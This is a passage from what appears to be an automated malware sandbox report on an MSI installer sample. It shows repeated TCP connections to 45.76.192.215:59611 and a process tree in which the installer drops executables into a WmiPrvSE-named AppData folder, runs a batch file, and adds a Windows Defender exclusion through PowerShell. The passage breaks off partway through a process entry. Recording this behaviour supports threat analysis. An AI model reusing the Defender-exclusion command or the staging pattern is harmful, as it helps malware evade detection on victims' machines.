                                        Aug 4, 2024 10:49:38.629362106 CEST4971559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:38.755064964 CEST4971659611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:38.759958982 CEST596114971645.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:38.760106087 CEST4971659611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:38.760514021 CEST4971659611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:38.765372992 CEST596114971645.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:42.770076990 CEST4971659611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:42.911168098 CEST4971759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:42.916476011 CEST596114971745.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:42.916618109 CEST4971759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:42.917071104 CEST4971759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:42.921909094 CEST596114971745.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:46.926280975 CEST4971759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:47.053421974 CEST4971859611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:47.131129026 CEST596114971845.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:47.131249905 CEST4971859611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:47.131608963 CEST4971859611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:47.136432886 CEST596114971845.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:51.144968033 CEST4971859611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:51.270653009 CEST4971959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:51.404462099 CEST596114971945.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:51.404563904 CEST4971959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:51.404949903 CEST4971959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:51.409801960 CEST596114971945.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:55.410705090 CEST4971959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:55.551664114 CEST4972059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:55.556597948 CEST596114972045.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:55.556704998 CEST4972059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:55.556982994 CEST4972059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:55.561713934 CEST596114972045.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:59.569540977 CEST4972059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:59.711925030 CEST4972159611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:59.718545914 CEST596114972145.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:59.718679905 CEST4972159611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:59.718945026 CEST4972159611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:59.725539923 CEST596114972145.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:03.723112106 CEST4972159611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:03.848644972 CEST4972259611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:04.067219019 CEST596114972245.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:04.067392111 CEST4972259611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:04.067836046 CEST4972259611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:04.072638035 CEST596114972245.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:08.067115068 CEST4972259611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:08.208039999 CEST4972459611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:08.214039087 CEST596114972445.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:08.214134932 CEST4972459611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:08.214524984 CEST4972459611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:08.219450951 CEST596114972445.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:12.223342896 CEST4972459611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:12.350821972 CEST4972559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:12.355792999 CEST596114972545.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:12.355874062 CEST4972559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:12.356156111 CEST4972559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:12.361869097 CEST596114972545.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:16.364614964 CEST4972559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:16.489305019 CEST4972759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:16.494298935 CEST596114972745.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:16.494378090 CEST4972759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:16.494805098 CEST4972759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:16.499635935 CEST596114972745.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:20.504465103 CEST4972759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:20.631546021 CEST4972859611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:20.636951923 CEST596114972845.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:20.637053967 CEST4972859611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:20.637442112 CEST4972859611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:20.642319918 CEST596114972845.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:24.645131111 CEST4972859611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:24.772758961 CEST4972959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:24.778047085 CEST596114972945.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:24.778172970 CEST4972959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:24.778548002 CEST4972959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:24.783447981 CEST596114972945.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:28.785696983 CEST4972959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:28.912980080 CEST4973059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:28.917864084 CEST596114973045.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:28.917948961 CEST4973059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:28.918211937 CEST4973059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:28.923070908 CEST596114973045.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:32.926309109 CEST4973059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:33.067519903 CEST4973459611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:33.072695971 CEST596114973445.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:33.072817087 CEST4973459611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:33.073200941 CEST4973459611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:33.077994108 CEST596114973445.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:37.082540989 CEST4973459611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:37.241767883 CEST4973559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:37.246978998 CEST596114973545.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:37.247101068 CEST4973559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:37.247483969 CEST4973559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:37.252616882 CEST596114973545.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:41.254581928 CEST4973559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:41.444272995 CEST4973659611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:41.449419975 CEST596114973645.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:41.449556112 CEST4973659611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:41.449807882 CEST4973659611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:41.454818010 CEST596114973645.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:45.459276915 CEST4973659611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:45.795500994 CEST4973759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:45.800512075 CEST596114973745.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:45.800590992 CEST4973759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:45.806664944 CEST4973759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:45.811592102 CEST596114973745.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:49.816895962 CEST4973759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:50.010123014 CEST4973859611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:50.015208960 CEST596114973845.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:50.015295029 CEST4973859611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:50.015656948 CEST4973859611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:50.020567894 CEST596114973845.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:54.020088911 CEST4973859611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:54.194236040 CEST4973959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:54.199306965 CEST596114973945.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:54.199395895 CEST4973959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:54.199721098 CEST4973959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:54.204793930 CEST596114973945.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:58.207551956 CEST4973959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:58.366895914 CEST4974059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:58.371912956 CEST596114974045.76.192.215192.168.2.8
                                        Aug 4, 2024 10:50:58.372029066 CEST4974059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:58.372375965 CEST4974059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:50:58.377939939 CEST596114974045.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:02.382473946 CEST4974059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:02.570283890 CEST4974159611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:02.575191975 CEST596114974145.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:02.577399969 CEST4974159611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:02.581600904 CEST4974159611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:02.586388111 CEST596114974145.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:06.582745075 CEST4974159611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:06.944405079 CEST4974259611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:06.949419975 CEST596114974245.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:06.949649096 CEST4974259611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:06.949932098 CEST4974259611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:06.955506086 CEST596114974245.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:10.957648039 CEST4974259611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:11.350573063 CEST4974359611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:11.355633974 CEST596114974345.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:11.355856895 CEST4974359611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:11.356260061 CEST4974359611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:11.361457109 CEST596114974345.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:15.363918066 CEST4974359611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:15.710807085 CEST4974459611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:15.715816975 CEST596114974445.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:15.715917110 CEST4974459611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:15.716217995 CEST4974459611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:15.720987082 CEST596114974445.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:19.723963022 CEST4974459611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:19.913882017 CEST4974559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:19.918725967 CEST596114974545.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:19.918802977 CEST4974559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:19.919157982 CEST4974559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:19.924417973 CEST596114974545.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:23.926397085 CEST4974559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:24.101556063 CEST4974659611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:24.106378078 CEST596114974645.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:24.106468916 CEST4974659611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:24.106847048 CEST4974659611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:24.111633062 CEST596114974645.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:28.113854885 CEST4974659611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:28.275830030 CEST4974759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:28.280810118 CEST596114974745.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:28.280914068 CEST4974759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:28.281357050 CEST4974759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:28.286168098 CEST596114974745.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:32.287106037 CEST4974759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:32.650163889 CEST4974859611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:32.655138016 CEST596114974845.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:32.655244112 CEST4974859611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:32.657282114 CEST4974859611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:32.662122011 CEST596114974845.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:36.661240101 CEST4974859611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:36.977849007 CEST4974959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:36.982789040 CEST596114974945.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:36.983246088 CEST4974959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:36.985608101 CEST4974959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:36.990582943 CEST596114974945.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:40.974734068 CEST4974959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:41.343538046 CEST4975059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:41.348567963 CEST596114975045.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:41.349426985 CEST4975059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:41.355314016 CEST4975059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:41.360301971 CEST596114975045.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:45.348642111 CEST4975059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:45.764175892 CEST4975159611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:45.769150972 CEST596114975145.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:45.769309998 CEST4975159611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:45.770570993 CEST4975159611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:45.775352955 CEST596114975145.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:49.770268917 CEST4975159611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:49.931689024 CEST4975259611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:49.938498020 CEST596114975245.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:49.938616037 CEST4975259611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:49.939024925 CEST4975259611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:49.943912029 CEST596114975245.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:53.942300081 CEST4975259611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:54.102262020 CEST4975359611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:54.107397079 CEST596114975345.76.192.215192.168.2.8
                                        Aug 4, 2024 10:51:54.107490063 CEST4975359611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:54.107887030 CEST4975359611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:51:54.112807035 CEST596114975345.76.192.215192.168.2.8
                                        Aug 4, 2024 10:52:15.498950005 CEST596114975345.76.192.215192.168.2.8
                                        Aug 4, 2024 10:52:15.502310038 CEST4975359611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:15.551208973 CEST4975359611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:15.556149006 CEST596114975345.76.192.215192.168.2.8
                                        Aug 4, 2024 10:52:15.748449087 CEST4975459611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:15.753662109 CEST596114975445.76.192.215192.168.2.8
                                        Aug 4, 2024 10:52:15.753737926 CEST4975459611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:15.754261971 CEST4975459611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:15.759474993 CEST596114975445.76.192.215192.168.2.8
                                        Aug 4, 2024 10:52:37.138608932 CEST596114975445.76.192.215192.168.2.8
                                        Aug 4, 2024 10:52:37.138957977 CEST4975459611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:37.142050982 CEST4975459611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:37.146836042 CEST596114975445.76.192.215192.168.2.8
                                        Aug 4, 2024 10:52:37.175380945 CEST4975559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:37.180381060 CEST596114975545.76.192.215192.168.2.8
                                        Aug 4, 2024 10:52:37.183465958 CEST4975559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:37.183582067 CEST4975559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:37.189735889 CEST596114975545.76.192.215192.168.2.8
                                        Aug 4, 2024 10:52:37.189740896 CEST596114975545.76.192.215192.168.2.8
                                        Aug 4, 2024 10:52:37.190251112 CEST4975559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:37.321218014 CEST4975659611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:37.326284885 CEST596114975645.76.192.215192.168.2.8
                                        Aug 4, 2024 10:52:37.326948881 CEST4975659611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:37.327385902 CEST4975659611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:37.332194090 CEST596114975645.76.192.215192.168.2.8
                                        Aug 4, 2024 10:52:58.723426104 CEST596114975645.76.192.215192.168.2.8
                                        Aug 4, 2024 10:52:58.727770090 CEST4975659611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:58.728212118 CEST4975659611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:58.733047009 CEST596114975645.76.192.215192.168.2.8
                                        Aug 4, 2024 10:52:58.778871059 CEST4975759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:58.783879995 CEST596114975745.76.192.215192.168.2.8
                                        Aug 4, 2024 10:52:58.783967972 CEST4975759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:58.784468889 CEST4975759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:52:58.789443016 CEST596114975745.76.192.215192.168.2.8
                                        Aug 4, 2024 10:53:20.174412012 CEST596114975745.76.192.215192.168.2.8
                                        Aug 4, 2024 10:53:20.174660921 CEST4975759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:53:20.174782991 CEST4975759611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:53:20.179662943 CEST596114975745.76.192.215192.168.2.8
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Aug 4, 2024 10:49:14.712523937 CEST1.1.1.1192.168.2.80x5aa4No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                        Aug 4, 2024 10:49:14.712523937 CEST1.1.1.1192.168.2.80x5aa4No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:04:49:09
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\msiexec.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\1eSOBjseu2.msi"
                                        Imagebase:0x7ff742d90000
                                        File size:69'632 bytes
                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:2
                                        Start time:04:49:09
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\msiexec.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                        Imagebase:0x7ff742d90000
                                        File size:69'632 bytes
                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:3
                                        Start time:04:49:10
                                        Start date:04/08/2024
                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 0985FCADD1B04D258216E8A4DAB0DBB9
                                        Imagebase:0x280000
                                        File size:59'904 bytes
                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:04:49:11
                                        Start date:04/08/2024
                                        Path:C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe"
                                        Imagebase:0x60000
                                        File size:894'464 bytes
                                        MD5 hash:10F3B7105634BEF29E229ECDA63E08C1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        Reputation:low
                                        Has exited:true

                                        Target ID:5
                                        Start time:04:49:11
                                        Start date:04/08/2024
                                        Path:C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe"
                                        Imagebase:0x7ff7bb230000
                                        File size:684'087 bytes
                                        MD5 hash:D2733BF9C81DDF4F730C65FCE8E02629
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 47%, ReversingLabs
                                        Reputation:low
                                        Has exited:true

                                        Target ID:6
                                        Start time:04:49:12
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" "
                                        Imagebase:0x7ff6f8050000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:04:49:12
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6ee680000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:04:49:12
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'"
                                        Imagebase:0x7ff6cb6b0000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:04:49:12
                                        Start date:04/08/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_4A51.ps1 -paths 'C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE','C:\Users\user\AppData\Roaming\WmiPrvSE' -retry_count 10"
                                        Imagebase:0x350000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:10
                                        Start time:04:49:13
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6ee680000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:11
                                        Start time:04:49:15
                                        Start date:04/08/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                        Imagebase:0x350000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:12
                                        Start time:04:49:15
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6ee680000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:13
                                        Start time:04:49:15
                                        Start date:04/08/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                        Imagebase:0x350000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:14
                                        Start time:04:49:15
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6ee680000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:15
                                        Start time:04:49:16
                                        Start date:04/08/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                        Imagebase:0x350000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:16
